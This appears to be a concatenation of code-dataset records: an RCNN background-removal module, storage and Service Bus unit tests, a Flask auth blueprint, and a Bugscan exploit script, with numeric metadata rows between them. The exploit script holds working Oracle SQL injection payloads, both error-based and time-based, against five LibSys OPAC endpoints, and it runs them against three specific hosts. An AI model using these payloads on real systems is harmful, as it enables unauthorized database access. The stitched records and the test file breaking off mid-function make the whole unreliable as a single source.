        :param prep_image: Prepared for the neural network image
        :param orig_image: Source image
        :return: Image without background
        """
        _, resized_image, results = self.__mask_rcnn__.process_image(orig_image)
        classes = self.__mask_rcnn__.class_names
        bboxes = results['bboxes']
        masks = results['masks']
        ids = results['ids']
        scores = results['scores']
        if len(bboxes) < 1:
            # Nothing detected: fall back to plain background removal.
            return model.__get_output__(prep_image, orig_image)
        # The detector's output arrays must agree in length; otherwise fall back.
        if ids is not None and len(bboxes) != len(ids):
            return model.__get_output__(prep_image, orig_image)
        if scores is not None and len(bboxes) != len(scores):
            return model.__get_output__(prep_image, orig_image)
        objects = []
        for i, bbox in enumerate(bboxes):
            if scores is not None and scores.flat[i] < 0.5:
                continue  # low-confidence detection
            if ids is not None and ids.flat[i] < 0:
                continue  # invalid class id
            object_cls_id = int(ids.flat[i]) if ids is not None else -1
            # BUGFIX: require a non-negative index — the original test
            # `object_cls_id < len(classes)` let -1 slip through and
            # returned the wrong label from classes[-1].
            if classes is not None and 0 <= object_cls_id < len(classes):
                object_label = classes[object_cls_id]
            else:
                object_label = str(object_cls_id) if object_cls_id >= 0 else ''
            object_border = self.__orig_object_border__(bbox, orig_image, resized_image)
            object_mask = masks[i, :, :]
            objects.append([object_label, object_border, object_mask])
        if len(objects) <= 1:
            # Zero or one object: standard whole-image removal works best.
            return model.__get_output__(prep_image, orig_image)
        obj_images = []
        for obj in objects:
            extended_mask = self.__mask_extend__(obj[2])
            obj_masked = self.__apply_mask__(orig_image, extended_mask)
            obj_crop_masked = obj_masked.crop(obj[1])
            # TODO: make a special algorithm to improve the removal of
            # background from images with people. Both branches of the
            # original code were identical, so all objects (including
            # "person") are processed the same way for now.
            obj_images.append([model.process_image(obj_crop_masked), obj])
        image = Image.new("RGBA", orig_image.size)
        for obj in obj_images:
            image = self.trans_paste(image, obj[0], obj[1][1])
        return image
class FastRcnn:
    """
    Fast RCNN neural network wrapper used to detect objects in the photo.
    """

    def __init__(self):
        # gluoncv/mxnet are imported lazily so the module can be loaded
        # even when this preprocessor is never instantiated.
        from gluoncv import model_zoo, data
        from mxnet import nd
        self.model_zoo = model_zoo
        self.data = data
        self.nd = nd
        logger.debug("Loading Fast RCNN neural network")
        # Downloads the pre-trained model if it is missing.
        self.__net__ = self.model_zoo.get_model('faster_rcnn_resnet50_v1b_voc',
                                                pretrained=True)
        # noinspection PyUnresolvedReferences
        self.class_names = self.__net__.classes

    def __load_image__(self, data_input):
        """
        Loads an image file for other processing
        :param data_input: Path to image file or PIL image
        :return: neural network input, image ndarray, resized image ndarray
                 (or a triple of False on failure)
        """
        if isinstance(data_input, str):
            try:
                data_input = Image.open(data_input)
                # Fix https://github.com/OPHoperHPO/image-background-remove-tool/issues/19
                data_input = data_input.convert("RGB")
                image = np.array(data_input)  # Convert PIL image to numpy arr
            except IOError:
                logger.error('Cannot retrieve image. Please check file: ' + data_input)
                # BUGFIX: callers unpack three values; the original returned
                # only two here, which raised ValueError at the call site
                # instead of signalling the failure.
                return False, False, False
        else:
            # Fix https://github.com/OPHoperHPO/image-background-remove-tool/issues/19
            data_input = data_input.convert("RGB")
            image = np.array(data_input)  # Convert PIL image to numpy arr
        x, resized_image = self.data.transforms.presets.rcnn.transform_test(self.nd.array(image))
        return x, image, resized_image

    def process_image(self, image):
        """
        Detects objects in the photo and returns their names, borders.
        :param image: Path to image or PIL image.
        :return: original image ndarray, resized image ndarray, dict(ids, scores, bboxes)
        """
        start_time = time.time()  # Time counter
        x, image, resized_image = self.__load_image__(image)
        ids, scores, bboxes = [xx[0].asnumpy() for xx in self.__net__(x)]
        logger.debug("Finished! Time spent: {}".format(time.time() - start_time))
        return image, resized_image, {"ids": ids, "scores": scores, "bboxes": bboxes}
class MaskRcnn:
    """
    Mask RCNN neural network wrapper used to detect objects and their
    masks in the photo.
    """

    def __init__(self):
        # gluoncv/mxnet are imported lazily so the module can be loaded
        # even when this preprocessor is never instantiated.
        from gluoncv import model_zoo, utils, data
        from mxnet import nd
        self.model_zoo = model_zoo
        self.utils = utils
        self.data = data
        self.nd = nd
        logger.debug("Loading Mask RCNN neural network")
        # Downloads the pre-trained model if it is missing.
        self.__net__ = self.model_zoo.get_model('mask_rcnn_resnet50_v1b_coco',
                                                pretrained=True)
        # noinspection PyUnresolvedReferences
        self.class_names = self.__net__.classes

    def __load_image__(self, data_input):
        """
        Loads an image file for other processing
        :param data_input: Path to image file or PIL image
        :return: neural network input, original image ndarray, resized image ndarray
                 (or a triple of False on failure)
        """
        if isinstance(data_input, str):
            try:
                data_input = Image.open(data_input)
                # Fix https://github.com/OPHoperHPO/image-background-remove-tool/issues/19
                data_input = data_input.convert("RGB")
                image = np.array(data_input)  # Convert PIL image to numpy arr
            except IOError:
                logger.error('Cannot retrieve image. Please check file: ' + data_input)
                # BUGFIX: callers unpack three values; the original returned
                # only two here, which raised ValueError at the call site
                # instead of signalling the failure.
                return False, False, False
        else:
            # Fix https://github.com/OPHoperHPO/image-background-remove-tool/issues/19
            data_input = data_input.convert("RGB")
            image = np.array(data_input)  # Convert PIL image to numpy arr
        x, resized_image = self.data.transforms.presets.rcnn.transform_test(self.nd.array(image))
        return x, image, resized_image

    def process_image(self, image):
        """
        Detects objects in the photo and returns their names, borders and a mask of poor quality.
        :param image: Path to image or PIL image.
        :return: original image ndarray, resized image ndarray, dict(ids, scores, bboxes, masks)
        """
        start_time = time.time()  # Time counter
        x, image, resized_image = self.__load_image__(image)
        ids, scores, bboxes, masks = [xx[0].asnumpy() for xx in self.__net__(x)]
        # Expand the low-resolution RoI masks to full-image size.
        masks, _ = self.utils.viz.expand_mask(masks, bboxes, (image.shape[1], image.shape[0]), scores)
        logger.debug("Finished! Time spent: {}".format(time.time() - start_time))
        return image, resized_image, {"ids": ids, "scores": scores, "bboxes": bboxes,
                                      "masks": masks}
| 41.571739
| 118
| 0.592323
| 2,404
| 19,123
| 4.522047
| 0.135607
| 0.026493
| 0.01803
| 0.019869
| 0.806366
| 0.795511
| 0.777297
| 0.762395
| 0.741514
| 0.730292
| 0
| 0.010191
| 0.327825
| 19,123
| 459
| 119
| 41.662309
| 0.835538
| 0.302672
| 0
| 0.730769
| 0
| 0
| 0.030635
| 0.004365
| 0
| 0
| 0
| 0.006536
| 0
| 1
| 0.059441
| false
| 0
| 0.031469
| 0
| 0.202797
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73fe8a2768e93ec07db2c5fcda15c6b8e904828f
| 8,104
|
py
|
Python
|
tests/test_storages.py
|
itcrab/dark-keeper
|
7a263b210ec01f712c9173f65871193ac2190c31
|
[
"MIT"
] | 2
|
2016-10-21T06:57:26.000Z
|
2016-10-22T20:44:25.000Z
|
tests/test_storages.py
|
itcrab/dark_keeper
|
7a263b210ec01f712c9173f65871193ac2190c31
|
[
"MIT"
] | 8
|
2017-12-01T05:31:55.000Z
|
2021-03-20T13:04:05.000Z
|
tests/test_storages.py
|
itcrab/dark_keeper
|
7a263b210ec01f712c9173f65871193ac2190c31
|
[
"MIT"
] | 1
|
2021-05-07T16:37:57.000Z
|
2021-05-07T16:37:57.000Z
|
import pytest
from dark_keeper.storages import UrlsStorage, DataStorage
class TestUrlsStorage:
    """Behavioural tests for UrlsStorage: seeding, deduplication and URL validation."""

    BASE = 'http://podcast-site.com/'
    PAGE_1 = BASE + 'page/1'
    PAGE_2 = BASE + 'page/2'
    PAGE_3 = BASE + 'page/3'

    def test_urls_storage(self):
        storage = UrlsStorage(self.BASE)
        assert storage == [self.BASE]

    def test_urls_storage_no_base_url(self):
        # The constructor requires base_url as a positional argument.
        with pytest.raises(TypeError) as e:
            UrlsStorage()
        assert str(e.value) == '__init__() missing 1 required positional argument: \'base_url\''

    def test_urls_storage_write_new_urls(self):
        storage = UrlsStorage(self.BASE)
        storage.write([self.PAGE_1, self.PAGE_2, self.PAGE_3])
        assert storage == [self.BASE, self.PAGE_1, self.PAGE_2, self.PAGE_3]

    def test_urls_storage_write_new_urls_blank(self):
        storage = UrlsStorage(self.BASE)
        storage.write([])
        assert storage == [self.BASE]

    def test_urls_storage_write_new_urls_blank_value(self):
        # Empty strings and None values must be ignored.
        storage = UrlsStorage(self.BASE)
        storage.write(['', None])
        assert storage == [self.BASE]

    def test_urls_storage_write_new_urls_duplicated_base_url(self):
        storage = UrlsStorage(self.BASE)
        storage.write([self.PAGE_1, self.PAGE_2, self.PAGE_3, self.BASE])
        assert storage == [self.BASE, self.PAGE_1, self.PAGE_2, self.PAGE_3]

    def test_urls_storage_write_new_urls_duplicated(self):
        storage = UrlsStorage(self.BASE)
        storage.write([self.PAGE_1,
                       self.PAGE_2, self.PAGE_2,
                       self.PAGE_3, self.PAGE_3, self.PAGE_3])
        assert storage == [self.BASE, self.PAGE_1, self.PAGE_2, self.PAGE_3]

    def test_urls_storage_write_new_urls_twice(self):
        storage = UrlsStorage(self.BASE)
        storage.write([self.PAGE_1])
        assert storage == [self.BASE, self.PAGE_1]
        storage.write([self.PAGE_2, self.PAGE_3])
        assert storage == [self.BASE, self.PAGE_1, self.PAGE_2, self.PAGE_3]

    def test_urls_storage_write_new_urls_twice_duplicated(self):
        storage = UrlsStorage(self.BASE)
        storage.write([self.PAGE_1])
        assert storage == [self.BASE, self.PAGE_1]
        storage.write([self.PAGE_2, self.PAGE_2,
                       self.PAGE_3, self.PAGE_3, self.PAGE_3])
        assert storage == [self.BASE, self.PAGE_1, self.PAGE_2, self.PAGE_3]

    def test_urls_storage_validation_blank_url(self):
        assert UrlsStorage('') == []

    def test_urls_storage_validation_wrong_url(self):
        for bad_url in ['wrong url', '123 456 789', 'test url for validation']:
            assert UrlsStorage(bad_url) == []

    def test_urls_storage_validation_only_domain(self):
        # A bare domain without a scheme is rejected.
        assert UrlsStorage('wrong-url.ru') == []

    def test_urls_storage_write_validation_blank_url(self):
        storage = UrlsStorage(self.BASE)
        storage.write('')
        assert storage == [self.BASE]

    def test_urls_storage_write_validation_wrong_url(self):
        storage = UrlsStorage(self.BASE)
        for bad_url in ['wrong url', '123 456 789', 'test url for validation']:
            storage.write(bad_url)
            assert storage == [self.BASE]

    def test_urls_storage_write_validation_only_domain(self):
        storage = UrlsStorage(self.BASE)
        storage.write('wrong-url.ru')
        assert storage == [self.BASE]
class TestDataStorage:
    """Behavioural tests for DataStorage: writing records and skipping blanks."""

    @staticmethod
    def _record(num):
        # Build a podcast record of the shape the crawler produces.
        return {'title': 'title %d' % num, 'desc': 'desc %d' % num, 'mp3': 'podcast_%d.mp3' % num}

    def test_data_storage(self):
        storage = DataStorage()
        storage.write(self._record(1))
        assert storage == [self._record(1)]

    def test_data_storage_value_list(self):
        storage = DataStorage()
        storage.write([self._record(1), self._record(2)])
        assert storage == [self._record(1), self._record(2)]

    def test_data_storage_value_list_blank_value(self):
        # Empty dicts and None values inside a list must be skipped.
        storage = DataStorage()
        storage.write([self._record(1), {}, self._record(2)])
        assert storage == [self._record(1), self._record(2)]
        storage.write([None, {}, None])
        assert storage == [self._record(1), self._record(2)]

    def test_data_storage_blank_value(self):
        storage = DataStorage()
        storage.write({})
        assert storage == []
        storage.write(None)
        assert storage == []

    def test_data_storage_blank_value_list(self):
        storage = DataStorage()
        storage.write([{}, {}, {}])
        assert storage == []
        storage.write([None, {}, None])
        assert storage == []

    def test_data_storage_blank(self):
        assert DataStorage() == []
| 35.234783
| 96
| 0.581565
| 1,000
| 8,104
| 4.475
| 0.062
| 0.15486
| 0.211173
| 0.253408
| 0.915978
| 0.915978
| 0.894749
| 0.872179
| 0.835084
| 0.806257
| 0
| 0.019841
| 0.272335
| 8,104
| 229
| 97
| 35.388646
| 0.73902
| 0
| 0
| 0.683673
| 0
| 0
| 0.273198
| 0
| 0
| 0
| 0
| 0
| 0.132653
| 1
| 0.107143
| false
| 0
| 0.010204
| 0
| 0.127551
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fb5188810d4efdc4565762f089a992f14495f31e
| 166
|
py
|
Python
|
src/visualization/dashboard/server/auth/__init__.py
|
ClaasM/streamed-sentiment-topic-intent
|
76f6e8686ab629391fd714228547ed1de097466c
|
[
"MIT"
] | null | null | null |
src/visualization/dashboard/server/auth/__init__.py
|
ClaasM/streamed-sentiment-topic-intent
|
76f6e8686ab629391fd714228547ed1de097466c
|
[
"MIT"
] | 8
|
2020-03-24T15:33:52.000Z
|
2022-03-11T23:16:16.000Z
|
src/visualization/dashboard/server/auth/__init__.py
|
ClaasM/streamed-sentiment-topic-intent
|
76f6e8686ab629391fd714228547ed1de097466c
|
[
"MIT"
] | null | null | null |
from server.auth.twitter import twitter_blueprint
url_prefix = '/auth'
def register_all(app):
    """Register all auth blueprints on *app* under the module-level '/auth' URL prefix."""
    app.register_blueprint(twitter_blueprint, url_prefix=url_prefix)
| 20.75
| 68
| 0.807229
| 23
| 166
| 5.521739
| 0.521739
| 0.212598
| 0.299213
| 0.393701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108434
| 166
| 7
| 69
| 23.714286
| 0.858108
| 0
| 0
| 0
| 0
| 0
| 0.03012
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
fb64b937ea53158125003f3aa47206fe80213a0c
| 69
|
py
|
Python
|
agents/__init__.py
|
empyriumz/QAS_RL
|
1f44f46acd9e61a8ed501cc7f0462c7217f46316
|
[
"MIT"
] | 5
|
2022-01-12T12:04:18.000Z
|
2022-03-03T19:33:15.000Z
|
agents/__init__.py
|
empyriumz/QAS_RL
|
1f44f46acd9e61a8ed501cc7f0462c7217f46316
|
[
"MIT"
] | null | null | null |
agents/__init__.py
|
empyriumz/QAS_RL
|
1f44f46acd9e61a8ed501cc7f0462c7217f46316
|
[
"MIT"
] | 2
|
2022-01-14T05:30:44.000Z
|
2022-03-03T19:37:27.000Z
|
from . import DeepQ
from . import DeepQ_PER
from . import DeepQNstep
| 17.25
| 24
| 0.782609
| 10
| 69
| 5.3
| 0.5
| 0.566038
| 0.566038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 69
| 3
| 25
| 23
| 0.929825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fbe10ea6bf93c066d857650d0393a3dadd202d54
| 4,039
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-1818.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-1818.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-1818.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2015-0135648
import time
def assign(service, arg):
    """Accept the scan task when it targets the 'libsys' service.

    :param service: service identifier supplied by the scanner framework
    :param arg: target base URL
    :return: ``(True, arg)`` for 'libsys'; ``None`` for any other service
    """
    return (True, arg) if service == "libsys" else None
def audit(arg):
    """Probe LibSys OPAC endpoints for Oracle SQL injection.

    Each payload entry maps a vulnerable URL path to an error-based
    XMLType payload; when the error marker is absent, a DBMS_PIPE
    time-based probe (5 s sleep vs no sleep) is used as a fallback.
    """
    payloads = {
        'opac/cls_browsing_book.php?cls=-1':'%27%29%20OR%207352%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%271%27%20LIKE%20%271',
        'asord/asord_searchresult.php?q=88952634&type=02':'%27%29%20AND%201055%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27Ofjo%27%3D%27Ofjo',
        'opac/search_rss.php?callno=I313.45&doctype=ALL&lang_code=ALL&match_flag=forward&displaypg=20&showmode=list&orderby=DESC&use_flag=3&sort=CATA_DATE&onlylendable=yes&location=-8641':'%20OR%202714%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29',
        'opac/peri_nav_cls_peri.php?classid=%00':'%27%20AND%203321%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27fKMS%27%3D%27fKMS',
        'opac/sci_browsing_book.php?cls=-6835':'%27%29%20OR%205155%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27zcdX%27%20LIKE%20%27zcdX',
    }
    # Time-based fallback probes: identical except for the sleep length (5 s vs 0 s).
    delay_probe = '%25%27%20AND%207394%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2884%29%7C%7CCHR%2875%29%7C%7CCHR%28100%29%7C%7CCHR%2885%29%2C5%29%20AND%20%27%25%27%3D%27'
    instant_probe = '%25%27%20AND%207394%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2884%29%7C%7CCHR%2875%29%7C%7CCHR%28100%29%7C%7CCHR%2885%29%2C0%29%20AND%20%27%25%27%3D%27'
    for path, probe in payloads.items():
        status, _head, body, _err, _ = curl.curl2(arg + path + probe)
        if status == 200 and 'qzkvq1qkjvq' in body:
            # Error-based marker found in the response body.
            security_hole(arg + path + " :sql Injection")
        else:
            t_start = time.time()
            status, _head, body, _errcode, _ = curl.curl2(arg + path + delay_probe)
            t_mid = time.time()
            status, _head, body, _errcode, _ = curl.curl2(arg + path + instant_probe)
            t_end = time.time()
            # 2*t_mid - t_start - t_end approximates (delayed duration -
            # instant duration); > 3 s implies the 5 s sleep executed.
            if status == 200 and (2 * t_mid - t_start - t_end > 3):
                security_hole(arg + path + " :sql Injection")
if __name__ == '__main__':
    # Standalone run: pull the curl/security_hole stubs from the scanner's
    # dummy harness and audit three known LibSys deployments.
    from dummy import *
    audit(assign('libsys', 'http://202.119.108.28/')[1])
    audit(assign('libsys', 'http://221.226.44.228/')[1])
    audit(assign('libsys', 'http://lib1.sdx.js.cn:88/')[1])
| 85.93617
| 585
| 0.694726
| 706
| 4,039
| 3.932011
| 0.233711
| 0.102305
| 0.213977
| 0.100865
| 0.707493
| 0.691643
| 0.667147
| 0.667147
| 0.653458
| 0.653458
| 0
| 0.338845
| 0.116613
| 4,039
| 47
| 586
| 85.93617
| 0.439182
| 0.025501
| 0
| 0.064516
| 0
| 0.258065
| 0.74196
| 0.704914
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.064516
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83755a142398f78cfe48bef3a7e3420890b031bc
| 39,386
|
py
|
Python
|
sdk/servicebus/azure-servicebus/tests/test_queues.py
|
tzhanl/azure-sdk-for-python
|
18cd03f4ab8fd76cc0498f03e80fbc99f217c96e
|
[
"MIT"
] | 1
|
2021-06-02T08:01:35.000Z
|
2021-06-02T08:01:35.000Z
|
sdk/servicebus/azure-servicebus/tests/test_queues.py
|
tzhanl/azure-sdk-for-python
|
18cd03f4ab8fd76cc0498f03e80fbc99f217c96e
|
[
"MIT"
] | 1
|
2019-06-04T18:12:16.000Z
|
2019-06-04T18:12:16.000Z
|
sdk/servicebus/azure-servicebus/tests/test_queues.py
|
tzhanl/azure-sdk-for-python
|
18cd03f4ab8fd76cc0498f03e80fbc99f217c96e
|
[
"MIT"
] | 1
|
2019-06-17T22:18:23.000Z
|
2019-06-17T22:18:23.000Z
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import logging
import sys
import os
import pytest
import time
from datetime import datetime, timedelta
from azure.servicebus import ServiceBusClient, QueueClient, AutoLockRenew
from azure.servicebus.common.message import Message, PeekMessage, BatchMessage, DeferredMessage
from azure.servicebus.common.constants import ReceiveSettleMode
from azure.servicebus.common.errors import (
ServiceBusError,
MessageLockExpired,
InvalidHandlerState,
MessageAlreadySettled,
AutoLockRenewTimeout,
MessageSendFailed,
MessageSettleFailed)
def get_logger(level):
    """Configure and return the 'azure' logger, also wiring up 'uamqp'.

    A stdout stream handler is attached to each logger only if it has no
    handlers yet, so repeated calls do not duplicate output.

    :param level: logging level applied to the 'azure' logger.
    :return: the 'azure' logger instance.
    """
    def _make_handler():
        # BUGFIX: the original created `handler` only inside the 'azure'
        # branch, so when 'azure' was already configured but 'uamqp' was
        # not, the 'uamqp' branch raised NameError on `handler`.
        handler = logging.StreamHandler(stream=sys.stdout)
        handler.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))
        return handler

    azure_logger = logging.getLogger("azure")
    if not azure_logger.handlers:
        azure_logger.setLevel(level)
        azure_logger.addHandler(_make_handler())

    uamqp_logger = logging.getLogger("uamqp")
    if not uamqp_logger.handlers:
        uamqp_logger.setLevel(logging.INFO)
        uamqp_logger.addHandler(_make_handler())
    return azure_logger
_logger = get_logger(logging.DEBUG)
def print_message(message):
    """Log a received Service Bus message and its metadata at debug level.

    ``locked_until``/``lock_token`` are unavailable for messages received in
    ReceiveAndDelete mode and raise TypeError — hence the try/except.
    """
    _logger.info("Receiving: {}".format(message))
    _logger.debug("Time to live: {}".format(message.time_to_live))
    _logger.debug("Sequence number: {}".format(message.sequence_number))
    _logger.debug("Enqueue Sequence numger: {}".format(message.enqueue_sequence_number))
    _logger.debug("Partition ID: {}".format(message.partition_id))
    _logger.debug("Partition Key: {}".format(message.partition_key))
    _logger.debug("User Properties: {}".format(message.user_properties))
    _logger.debug("Annotations: {}".format(message.annotations))
    _logger.debug("Delivery count: {}".format(message.header.delivery_count))
    try:
        _logger.debug("Locked until: {}".format(message.locked_until))
        _logger.debug("Lock Token: {}".format(message.lock_token))
    except TypeError:
        pass
    _logger.debug("Enqueued time: {}".format(message.enqueued_time))
@pytest.mark.liveTest
def test_queue_by_queue_client_conn_str_receive_handler_peeklock(live_servicebus_config, standard_queue):
    """Send 10 messages and receive them in default (PeekLock) mode,
    completing each one; all 10 must be delivered."""
    queue_client = QueueClient.from_connection_string(
        live_servicebus_config['conn_str'],
        name=standard_queue,
        debug=False)
    with queue_client.get_sender() as sender:
        for i in range(10):
            message = Message("Handler message no. {}".format(i))
            message.enqueue_sequence_number = i
            sender.send(message)
    # Receive until the queue stays idle for 5 seconds.
    receiver = queue_client.get_receiver(idle_timeout=5)
    count = 0
    for message in receiver:
        print_message(message)
        count += 1
        message.complete()
    assert count == 10
@pytest.mark.liveTest
def test_queue_by_queue_client_conn_str_receive_handler_receiveanddelete(live_servicebus_config, standard_queue):
    """In ReceiveAndDelete mode messages are settled on receipt: complete()
    must raise MessageAlreadySettled, and a second receive pass must find
    the queue empty."""
    queue_client = QueueClient.from_connection_string(
        live_servicebus_config['conn_str'],
        name=standard_queue,
        debug=False)
    with queue_client.get_sender() as sender:
        for i in range(10):
            message = Message("Handler message no. {}".format(i))
            message.enqueue_sequence_number = i
            sender.send(message)
    messages = []
    receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
    for message in receiver:
        messages.append(message)
        with pytest.raises(MessageAlreadySettled):
            message.complete()
    assert not receiver.running
    assert len(messages) == 10
    # Give the service time to settle before verifying the queue is empty.
    time.sleep(30)
    messages = []
    receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
    for message in receiver:
        messages.append(message)
    assert len(messages) == 0
@pytest.mark.liveTest
def test_queue_by_queue_client_conn_str_receive_handler_with_stop(live_servicebus_config, standard_queue):
    """Breaking out of the receiver iterator leaves it running; using it as a
    context manager afterwards shuts it down on exit."""
    queue_client = QueueClient.from_connection_string(
        live_servicebus_config['conn_str'],
        name=standard_queue,
        debug=False)

    with queue_client.get_sender() as sender:
        for i in range(10):
            message = Message("Stop message no. {}".format(i))
            sender.send(message)

    messages = []
    receiver = queue_client.get_receiver(idle_timeout=5)
    for message in receiver:
        messages.append(message)
        message.complete()
        if len(messages) >= 5:
            break
    # A plain break does not close the underlying handler.
    assert receiver.running
    assert len(messages) == 5

    with receiver:
        for message in receiver:
            messages.append(message)
            message.complete()
            # messages already holds 5 entries, so this breaks after one more.
            if len(messages) >= 5:
                break
    assert not receiver.running
    assert len(messages) == 6
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_simple(live_servicebus_config, standard_queue):
    """Iterate 10 PeekLock messages; settling twice raises, and iterating a
    closed receiver raises InvalidHandlerState."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)

    queue_client = client.get_queue(standard_queue)
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(10):
                message = Message("Iter message no. {}".format(i))
                sender.send(message)

        count = 0
        for message in receiver:
            print_message(message)
            message.complete()
            # Once settled, further settle/renew operations must fail fast.
            with pytest.raises(MessageAlreadySettled):
                message.complete()
            with pytest.raises(MessageAlreadySettled):
                message.renew_lock()
            count += 1

    # The context manager closed the handler; pulling more messages is invalid.
    with pytest.raises(InvalidHandlerState):
        next(receiver)
    assert count == 10
@pytest.mark.liveTest
def test_queue_by_servicebus_conn_str_client_iter_messages_with_abandon(live_servicebus_config, standard_queue):
    """Abandon each first delivery, complete the redelivery, then verify the
    queue drains to empty."""
